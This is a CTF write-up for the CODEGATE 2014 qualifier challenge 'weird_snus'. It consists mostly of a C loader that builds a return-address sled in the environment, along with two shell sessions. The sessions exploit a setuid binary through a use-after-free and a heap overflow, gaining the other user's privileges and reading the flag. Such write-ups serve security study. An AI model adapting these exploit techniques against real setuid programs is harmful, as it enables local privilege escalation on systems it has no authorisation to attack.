CODEGATE CTF 2014 QUAL - weird_snus

Overview

Category : Pwnables

File :

Summary : overwrite function pointer in heap by heap overflow or use-after-free, lift esp + ret sleding

Exploit

loader.c

#include <stdio.h>

#define RET "\x37\x93\x04\x08"

#define RET16  RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET

#define EXECL "\x40\x2e\x0f\x40"

//#define EXECL "\x50\x24\x0f\x40"

#define BINARY "\x74\x81\x04\x08"



char *args[] = {  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 

RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16  RET16 RET16 RET16 RET16 RET16   EXECL "AAAA" BINARY ,"","","","","","","","","","","","","","","","","","","",NULL};



int main(int argc, char **argv, char **envp)

{

    execve("/home/strongest_snus/weird_snus",argv, args);

}

exploit (uaf by setuid0)

weird_snus@notroot-virtual-machine:/tmp/id0aaaa$ ulimit -s unlimited

weird_snus@notroot-virtual-machine:/tmp/id0aaaa$ mkdir /tmp/id0aaaa$(python -c 'print "\x7d\x01\x15\x40"')

weird_snus@notroot-virtual-machine:/tmp/id0aaaa$ cd /tmp/id0aaaa$(python -c 'print "\x7d\x01\x15\x40"')

weird_snus@notroot-virtual-machine:/tmp/id0aaaa$ (python -c 'print "HEHE_I_DONT_KNOW_YO\x00\n" + "a"*2+"\x00\n"+"D\n"+"/tmp/id0aaaa\x7d\x01\x15\x40\n"+"A\n"+"M\n"+"G\x10\x00\x00\x00\n"+"A\n"';cat)|./loader `python -c 'print "()"'`

Hi, you've got here.. What's your name? : Welcome,  a!

Which directory you want to move?: Which directory you want to move?: 



id

uid=1001(strongest_snus) gid=1000(weird_snus) groups=1001(strongest_snus),1000(weird_snus)

ls -l

total 8

-rwxrwxr-x 1 weird_snus weird_snus 7418 Feb 23 09:12 GNU

cat /home/strongest_snus/flag 

N0_MoR3_SMOKING_SNUS

exploit (heap overflow by pwn3r)

weird_snus@notroot-virtual-machine:/tmp/qmfflcm$ ulimit -s unlimited

weird_snus@notroot-virtual-machine:/tmp/qmfflcm$ mkdir `python -c 'print "/tmp/qmfflcm/"+"\x01\x15\x40"+"\x7d\x01\x15\x40"*(240/4)'`

weird_snus@notroot-virtual-machine:/tmp/qmfflcm$ (python -c 'print "HEHE_I_DONT_KNOW_YO\x00\n" + "a"*2+"\x00\n"+"D\n/tmp/qmfflcm\n"+"G\x04\x00\x00\x00\n"+"A\n"+("D\n"+"\x01\x15\x40"+"\x7d\x01\x15\x40"*(240/4)+"\n")+"G\x15\x00\x00\x00\n"+"A"';cat)|./loader `python -c 'print "X\x40Z()"'`

Hi, you've got here.. What's your name? : Welcome,  a!

Which directory you want to move?: Which directory you want to move?: 



id

uid=1001(strongest_snus) gid=1000(weird_snus) groups=1001(strongest_snus),1000(weird_snus)

ls -l

total 8

-rwxrwxr-x 1 weird_snus weird_snus 7418 Feb 23 09:12 GNU

cat /home/strongest_snus/flag 

N0_MoR3_SMOKING_SNUS

저작자표시 (새창열림)

'CTF > 2014' 카테고리의 다른 글

CODEGATE CTF 2014 - drupbox (0)	2014.04.20
CODEGATE CTF 2014 QUAL - 4stone (0)	2014.04.20

Overview

Exploit

loader.c

exploit (uaf by setuid0)

exploit (heap overflow by pwn3r)

'CTF > 2014' 카테고리의 다른 글

티스토리툴바